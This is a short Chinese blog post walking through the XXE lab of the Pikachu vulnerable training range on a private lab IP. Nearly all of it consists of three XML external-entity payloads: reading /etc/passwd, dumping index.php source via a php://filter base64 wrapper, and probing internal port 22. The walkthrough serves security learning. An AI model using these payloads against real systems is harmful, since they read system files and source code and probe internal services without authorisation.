0
点赞
收藏
分享

微信扫一扫

Pikachu XXE漏洞1

夕颜合欢落 2022-05-22 阅读 71
phpxml

<?xml
version="1.0"?>

<!DOCTYPE
creds[

<!ELEMENT
username ANY>

<!ELEMENT
password ANY>

<!ENTITY xxe
SYSTEM "file:///etc/passwd">]>

<creds>

<username>&xxe;</username>

<password>test</password>

</creds>

Pikachu XXE漏洞1_xml

访问​​http://192.168.4.130/xxe/index.php​​

Pikachu XXE漏洞1_php_02

<?xml
version="1.0"?>

<!DOCTYPE
creds[

<!ELEMENT
username ANY>

<!ELEMENT
password ANY>

<!ENTITY xxe SYSTEM
"php://filter/read=convert.base64-encode/resource=index.php">]>

<creds>

<username>&xxe;</username>

<password>test</password>

</creds>

Pikachu XXE漏洞1_xml_03

访问​​http://192.168.4.130/xxe/index.php​​

Pikachu XXE漏洞1_php_04

<?xml
version="1.0"?>

<!DOCTYPE
creds[

<!ELEMENT
username ANY>

<!ELEMENT
password ANY>

<!ENTITY xxe SYSTEM "http://127.0.0.1:22">]>

<creds>

<username>&xxe;</username>

<password>test</password>

</creds>

Pikachu XXE漏洞1_php_05访问​


​​http://192.168.4.130/xxe/index.php​​

Pikachu XXE漏洞1_xml_06

举报

相关推荐

Pikachu漏洞靶场 XXE(xml外部实体注入漏洞)

web安全安全漏洞靶场XXE

XXE漏洞学习

web安全

逻辑漏洞(pikachu)

macosiMazingiMazing 3

【web安全】——XXE漏洞

安全云原生阿里云Nacos

Pikachu靶场--越权漏洞

线性代数矩阵

xxe漏洞--xml外部实体注入漏洞

r语言开发语言概率论

安鸾之XXE漏洞

web网络安全web安全渗透测试

Excel造成的XXE漏洞

日记本啦啦啦啦啦!

VULNHUB-XXE漏洞 靶机

leetcode

Pikachu漏洞靶场 ../../(目录遍历)

web安全安全漏洞靶场目录遍历
0 条评论